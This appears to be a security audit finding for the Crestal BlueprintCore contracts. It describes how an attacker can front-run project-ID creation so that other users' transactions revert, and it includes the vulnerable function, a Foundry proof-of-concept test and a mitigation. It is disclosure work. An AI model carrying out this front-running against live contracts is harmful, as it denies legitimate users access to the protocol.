Sour Menthol Whale

High

# Front-running creating Project and Proposal Request to disrupt the whole system

## Summary 
Let's understand the mechanism firstly - Users can create Project and assign Proposal Request to that `ProjectID`. However there is a flaw in the mechanism or consideration that - anyone can create and assign/set `projectId` as they want to with the proposal request. So an attacker could front-run the request of another `projectId` with `proposalRequest` in the protocol and make the other transaction revert as the `projectId` would show as taken


## Issue 
Let's understand with valid example based on the usage of [`createProjectIDAndProposalRequest`](https://github.com/sherlock-audit/2025-03-crestal-network/blob/main/crestal-omni-contracts/src/BlueprintCore.sol#L255-L263) : 
- So attacker watches the mempool, and see that there is a transaction `createProjectIDAndProposalRequest` with the following parameters and values : 
```solidity
   bytes32 projectid = 0x7465737400000000000000000000000000000000000000000000000000000000;
   string memory base64RecParam = "MHhhdWRyb24=";
   string memory serverURL = "https://0xaudron.xyz";
```

Note: `serverURL`, `base64RecParam` doesn't have to be same

- Attacker front-runs the same transaction and makes the victim's transaction revert
Basically any function involved with the creation of `projectId` can be vulnerable to this front-running attack like - `createProjectIDAndProposalRequest`, `createProjectIDAndProposalRequestWithSig`,  `createProjectIDAndDeploymentRequest`. 


## Root Cause  
The main root cause to this issue is the [`setProjectId`](https://github.com/sherlock-audit/2025-03-crestal-network/blob/main/crestal-omni-contracts/src/BlueprintCore.sol#L175-L187) function : 
```solidity
 function setProjectId(bytes32 projectId, address userAddr) internal newProject(projectId) {
        require(userAddr != dummyAddress, "Invalid userAddr");

        Project memory project =
            Project({id: projectId, requestProposalID: 0, requestDeploymentID: 0, proposedSolverAddr: dummyAddress});
        // set project info into mapping
        projects[projectId] = project;

        // set latest project
        latestProjectID[userAddr] = projectId;

        emit CreateProjectID(projectId, userAddr);
    }
```

## PoC
```solidity
    function test_frontRunToDisruptProjectMechanism() public {
        address victim = makeAddr("victim");
        address attacker = makeAddr("attacker");
        
        //Input fields
        bytes32 projectid = 0x7465737400000000000000000000000000000000000000000000000000000000;
        string memory base64RecParam = "MHhhdWRyb24=";
        string memory serverURL = "https://0xaudron.xyz";

        //Attacker front-runs and takeover this projectId under his address
        vm.prank(attacker);
        blueprint.createProjectIDAndProposalRequest(projectid, base64RecParam , serverURL);

        //Victim tx goes late, and he receives every time as attacker intends to disrupt the complete protocol
        vm.prank(victim);
        vm.expectRevert();
        blueprint.createProjectIDAndProposalRequest(projectid, base64RecParam , serverURL);
    }
```

## Impact
- However this issue has a great significance because the proposal and project creation is the first step, so if the attacker disrupts the user from first they could never go ahead.
- Risk to protocol's integrity and permanent shut down as an user could never create a `projectId` and a proposal request attached to that.

## Mitigation 
- Generate `projectId` and also don't give the user power to `setProjectId` on their own. Since `createProjectID` is already created for that sake, so use it instead of relying on user input.